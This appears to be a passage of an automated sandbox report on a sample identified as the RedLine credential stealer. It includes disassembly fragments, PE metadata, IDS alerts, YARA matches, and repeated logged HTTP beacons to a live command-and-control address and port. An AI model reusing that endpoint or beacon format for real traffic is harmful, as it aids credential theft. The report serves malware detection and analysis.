            mov dword ptr [ebp-0Ch], 01994000h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            push dword ptr [ebp-10h]
            push dword ptr [ebp-1Ch]
            push dword ptr [ebp-20h]
            call dword ptr [0041B000h]
            leave
            retn 0008h
            ret
            mov eax, 00413563h
            mov dword ptr [004228E4h], eax
            mov dword ptr [004228E8h], 00412C4Ah
            mov dword ptr [004228ECh], 00412BFEh
            mov dword ptr [004228F0h], 00412C37h
            mov dword ptr [004228F4h], 00412BA0h
            mov dword ptr [004228F8h], eax
            mov dword ptr [004228FCh], 004134DBh
            mov dword ptr [00422900h], 00412BBCh
            mov dword ptr [00422904h], 00412B1Eh
            mov dword ptr [00422908h], 00412AABh
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007FD44C80CC3Bh
            call 00007FD44C8134C0h
            cmp dword ptr [ebp+00h], 00000000h
            Programming Language:
            • [ASM] VS2008 build 21022
            • [IMP] VS2005 build 50727
            • [C++] VS2008 build 21022
            • [ C ] VS2008 build 21022
            • [LNK] VS2008 build 21022
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x215b4 | 0x50 | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26000 | 0xbc80 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1b1c0 | 0x1c | .rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x20da0 | 0x40 | .rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x184 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x19718 | 0x19800 | b6aec8924d721d3bc95041d88466ee8f | False | 0.5789388020833334 | data | 6.748515456937792 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x1b000 | 0x6db4 | 0x6e00 | 5826801f33fc1b607aa8e942aa92e9fa | False | 0.5467329545454546 | data | 6.442956247632331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0x22000 | 0x30c0 | 0x1600 | 2fe51a72ede820cd7cf55a77ba59b1f4 | False | 0.3126775568181818 | data | 3.2625868398009703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x26000 | 0xbc80 | 0xbe00 | d4c63ddf4e5cbab04008267e1aa294e8 | False | 0.9817639802631579 | data | 7.978964669267127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            Name         RVA      Size    Type                                                                               Language  Country  ZLIB Complexity
            RT_RCDATA    0x26124  0xb6f9  data                                                                               -         -        1.000448325185201
            RT_RCDATA    0x31820  0x20    data                                                                               -         -        1.34375
            RT_VERSION   0x31840  0x254   data                                                                               -         -        0.4597315436241611
            RT_MANIFEST  0x31a94  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators  -         -        0.5489795918367347
            DLL           Import
            KERNEL32.dll  RaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
            ole32.dll     OleInitialize
            OLEAUT32.dll  SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString
            Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
            2024-09-06T06:37:01.472489+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49730        109.234.38.212  6677       TCP
            2024-09-06T06:37:08.171917+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49731        109.234.38.212  6677       TCP
            2024-09-06T06:37:14.780061+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49732        109.234.38.212  6677       TCP
            2024-09-06T06:37:21.407768+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49739        109.234.38.212  6677       TCP
            2024-09-06T06:37:28.035446+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49740        109.234.38.212  6677       TCP
            2024-09-06T06:37:34.676824+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49741        109.234.38.212  6677       TCP
            2024-09-06T06:37:41.518633+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49742        109.234.38.212  6677       TCP
            2024-09-06T06:37:48.122852+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49743        109.234.38.212  6677       TCP
            2024-09-06T06:37:54.780880+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49745        109.234.38.212  6677       TCP
            2024-09-06T06:38:01.423282+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49746        109.234.38.212  6677       TCP
            2024-09-06T06:38:09.056633+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49747        109.234.38.212  6677       TCP
            2024-09-06T06:38:15.668068+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49748        109.234.38.212  6677       TCP
            2024-09-06T06:38:22.284052+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49749        109.234.38.212  6677       TCP
            2024-09-06T06:38:28.887423+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49750        109.234.38.212  6677       TCP
            2024-09-06T06:38:35.564617+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49751        109.234.38.212  6677       TCP
            2024-09-06T06:38:42.187989+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49752        109.234.38.212  6677       TCP
            2024-09-06T06:38:48.816093+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49753        109.234.38.212  6677       TCP
            2024-09-06T06:38:55.520218+0200  2849662  ETPRO MALWARE RedLine - CheckConnect Request  1         192.168.2.4  49754        109.234.38.212  6677       TCP
            • 109.234.38.212:6677
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449730109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:36:59.933815002 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449731109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:06.544361115 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.449732109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:13.187294006 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.449739109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:19.794682026 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.449740109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:26.419543982 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.449741109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:33.045231104 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.449742109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:39.862459898 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.449743109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:46.528717995 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.449745109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:53.138214111 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.449746109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:59.794393063 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.449747109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:06.434892893 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.449748109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:14.076097965 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.449749109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:20.685306072 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.449750109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:27.294527054 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.449751109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:33.915535927 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.449752109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:40.575736046 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.449753109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:47.200839996 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session ID: 17, Source IP: 192.168.2.4, Source Port: 49754, Destination IP: 109.234.38.212, Destination Port: 6677, PID: 7544, Process: C:\Users\user\Desktop\Implosions.exe
            Timestamp: Sep 6, 2024 06:38:53.888549089 CEST, Bytes transferred: 240, Direction: OUT, Data:
            POST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Target ID:0
            Start time:00:36:55
            Start date:06/09/2024
            Path:C:\Users\user\Desktop\Implosions.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\Implosions.exe"
            Imagebase:0x400000
            File size:187'904 bytes
            MD5 hash:AEED85E8A5B1D2013EA6FA0348E954D7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low
            Has exited:false

            Target ID:1
            Start time:00:36:55
            Start date:06/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

              Execution Graph

              Execution Coverage:10%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:20.4%
              Total number of Nodes:221
              Total number of Limit Nodes:25

              Control-flow Graph

              APIs
              • OleInitialize.OLE32(00000000), ref: 004019FD
              • _getenv.LIBCMT ref: 00401ABA
              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
              • Module32First.KERNEL32 ref: 00401C48
              • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
              • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
              • LockResource.KERNEL32(00000000), ref: 00401EA7
              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
              • _malloc.LIBCMT ref: 00401EBA
              • _memset.LIBCMT ref: 00401EDD
              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
              • API String ID: 2366190142-2962942730
              • Opcode ID: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
              • Opcode Fuzzy Hash: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `_q
              • API String ID: 0-2041170535
              • Opcode ID: de0cfec621ef0bc7f3a3ea56c3b1fd5daa373d9c412eb7c3edd26ec2ef6bd856
              • Instruction ID: 3f56da63c3f969c346553022ae4c80445eb76b20e811ae65a6e6154b64c9c0de
              • Opcode Fuzzy Hash: de0cfec621ef0bc7f3a3ea56c3b1fd5daa373d9c412eb7c3edd26ec2ef6bd856
              • Instruction Fuzzy Hash: F7225A30B003459FCB54EBB9D49866EBBF6BF88300B648869E506DB395DF34E946CB50
              Memory Dump Source
              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4cbef558d11e9f7c06a41c529fac64005b91e0b9e051b1a57a980c32e95d68f
              • Instruction ID: f67f6409fecb0d72908990cd5f62956885103f219f3f119135c2086881dd8d52
              • Opcode Fuzzy Hash: e4cbef558d11e9f7c06a41c529fac64005b91e0b9e051b1a57a980c32e95d68f
              • Instruction Fuzzy Hash: 2E82EA34B402148FDB55DF64D898BADBBB6BF88300F5085A9E50A9B3A5DF30AD85CF50
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 89560a5911c12f8bffb51e7ffe11784a656638910e0397c48f5bb47be46b3f70
              • Instruction ID: 06b4fe2314b012fdf949bb5b53812db334951cd3a1f26896c6329e5fa749af79
              • Opcode Fuzzy Hash: 89560a5911c12f8bffb51e7ffe11784a656638910e0397c48f5bb47be46b3f70
              • Instruction Fuzzy Hash: FE622738B102048FDB14EF78C894A6E7BB6BF88715F25456AE9069B3A5DF31DC42CB41
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 515a39d62b3590acfaefc645ef6cd85841c61a01cbe37b9741f2628397ac9c23
              • Instruction ID: ff91d9962ade174f969712c817c2c6e17a68eaa8ed555e786c29aac100b8966d
              • Opcode Fuzzy Hash: 515a39d62b3590acfaefc645ef6cd85841c61a01cbe37b9741f2628397ac9c23
              • Instruction Fuzzy Hash: BD722830A103458FDB25EF78D4547AEBBB2BF88300F54855AE44AAB365DB34ED86CB50
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38e0c6442a0b777aa63c7f14d8a8159016cce386faf22c1f4f6072726196ed22
              • Instruction ID: 0b9224f792b95cc33569d6dacc380788b03138ad4be86804f3d50466f0bef4d4
              • Opcode Fuzzy Hash: 38e0c6442a0b777aa63c7f14d8a8159016cce386faf22c1f4f6072726196ed22
              • Instruction Fuzzy Hash: F6626E35B002069FDB14DF79C494AAEBBB2FF88314F148968E9069B365DB70EC45CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3486e7872cbb48b713d5ecc03968516b30a6e0a5bc6dbee24bff651b270ae079
              • Instruction ID: 53503f0ee172932b31685a757601f8160c88741b617c525e6edf492ca5f263d6
              • Opcode Fuzzy Hash: 3486e7872cbb48b713d5ecc03968516b30a6e0a5bc6dbee24bff651b270ae079
              • Instruction Fuzzy Hash: 88424830B502059FCB58EB78D894A6DBBF6FF88300B648469E506DB3A5DF70EC458B90
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd2cbd73baa138661dc6ac543afc96e3c9c8bbda4a40168b4bcf3ff9b303b07c
              • Instruction ID: 94b18d6402305cc608236b2caaddaee0cd5849500fadfe316f5a3f9634f7cc93
              • Opcode Fuzzy Hash: dd2cbd73baa138661dc6ac543afc96e3c9c8bbda4a40168b4bcf3ff9b303b07c
              • Instruction Fuzzy Hash: FC229D31B003019FDB69AB78946872E7EE7BF84340F648869E946DB395EF34EC458B41
